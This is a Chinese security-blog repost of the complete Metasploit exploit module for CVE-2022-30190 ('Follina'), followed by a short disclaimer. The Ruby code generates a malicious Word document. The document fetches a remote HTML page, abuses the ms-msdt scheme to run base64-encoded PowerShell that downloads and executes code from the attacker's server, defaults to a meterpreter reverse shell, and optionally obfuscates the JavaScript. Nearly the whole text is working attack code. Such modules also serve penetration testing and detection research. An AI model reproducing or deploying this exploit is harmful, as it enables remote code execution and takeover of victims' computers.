CVE-2022-30190(Microsoft Office Word MSDTJS 远程代码执行)

admin 2025年1月11日13:31:43评论3 views字数 6062阅读20分12秒阅读模式
CVE-2022-30190

to metasploit exp

### This module requires Metasploit: https://metasploit.com/download##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::Powershell  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Office Word MSDTJS',        'Description' => %q{          This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.        },        'References' => [          ['CVE', '2022-30190'],          ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],          ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],          ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],          ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],          ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],          ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']        ],        'Author' => [          'nao sec', # Original disclosure.          'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity        ],        'DisclosureDate' => '2022-05-29',        'License' => MSF_LICENSE,        'Privileged' => false,        'Platform' => 'win',        'Arch' => [ARCH_X86, ARCH_X64],        'Payload' => {          'DisableNops' => true        },        'DefaultOptions' => {          'DisablePayloadHandler' => false,          'FILENAME' => 'msf.docx',          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',          'SRVHOST' => Rex::Socket.source_address('1.2.3.4')        },        'Targets' => [          [ 'Microsoft Office Word', {} ]        ],        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Follina'],          'Stability' => [CRASH_SAFE],          'Reliability' => [UNRELIABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])    ])  end  def get_file_in_docx(fname)    i = @docx.find_index { |item| item[:fname] == fname }    unless i      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")    end    @docx.fetch(i)[:data]  end  def get_template_path    datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')  end  def generate_html    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"    dummy = ''    (1..random_int(61, 100)).each do |_n|      dummy += '//' + rand_text_alpha(100) + "n"    end    cmd = Rex::Text.encode_base64("IEX(New-Object Net.WebClient).downloadString('#{uri}')")    js_content = "window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";"    if datastore['OBFUSCATE']      print_status('Obfuscate JavaScript content')      js_content = Rex::Exploitation::JSObfu.new js_content      js_content = js_content.obfuscate(memory_sensitive: false)    end    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'    html += "n#{dummy}n#{js_content}n"    html += '</script></body></html>'    html  end  def inject_docx    document_xml = get_file_in_docx('word/document.xml')    unless document_xml      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')    end    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')    unless document_xml_rels      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')    end    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"    @docx.each do |entry|      case entry[:fname]      when 'word/_rels/document.xml.rels'        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}&#x21;")      end    end  end  def normalize_uri(*strs)    new_str = strs * '/'    new_str = new_str.gsub!('//', '/') while new_str.index('//')    # makes sure there's a starting slash    unless new_str.start_with?('/')      new_str = '/' + new_str    end    new_str  end  def on_request_uri(cli, request)    header_html = {      'Access-Control-Allow-Origin' => '*',      'Access-Control-Allow-Methods' => 'GET, POST',      'Cache-Control' => 'no-store, no-cache, must-revalidate',      'Content-Type' => 'text/html; charset=UTF-8'    }    if request.method.eql? 'HEAD'      send_response(cli, '', header_html)    elsif request.method.eql? 'OPTIONS'      response = create_response(501, 'Unsupported Method')      response['Content-Type'] = 'text/html'      response.body = ''      cli.send_response(response)    elsif request.raw_uri.to_s.end_with? '.html'      print_status('Sending HTML Payload')      send_response_html(cli, generate_html, header_html)    elsif request.raw_uri.to_s.end_with? '.ps1'      print_status('Sending PowerShell Payload')      send_response(cli, @payload_data, header_html)    end  end  def pack_docx    @docx.each do |entry|      if entry[:data].is_a?(Nokogiri::XML::Document)        entry[:data] = entry[:data].to_s      end    end    Msf::Util::EXE.to_zip(@docx)  end  def primer    print_status('Generating a malicious docx file')    @proto = (datastore['SSL'] ? 'https' : 'http')    template_path = get_template_path    unless File.extname(template_path).downcase.end_with?('.docx')      fail_with(Failure::BadConfig, 'Template is not a docx file!')    end    print_status("Using template '#{template_path}'")    @docx = unpack_docx(template_path)    print_status('Injecting payload in docx document')    inject_docx    print_status("Finalizing docx '#{datastore['FILENAME']}'")    file_create(pack_docx)    @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)    super  end  def random_int(min, max)    rand(max - min) + min  end  def unpack_docx(template_path)    document = []    Zip::File.open(template_path) do |entries|      entries.each do |entry|        if entry.name.downcase.end_with?('.xml', '.rels')          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?        elsif entry.file?          content = entry.get_input_stream.read        end        vprint_status("Parsing item from template: #{entry.name}")        document << { fname: entry.name, data: content }      end    end    document  endend

原文始发于微信公众号(暗影安全):CVE-2022-30190(Microsoft Office Word MSDTJS 远程代码执行)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日13:31:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-30190(Microsoft Office Word MSDTJS 远程代码执行)https://cn-sec.com/archives/1210969.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息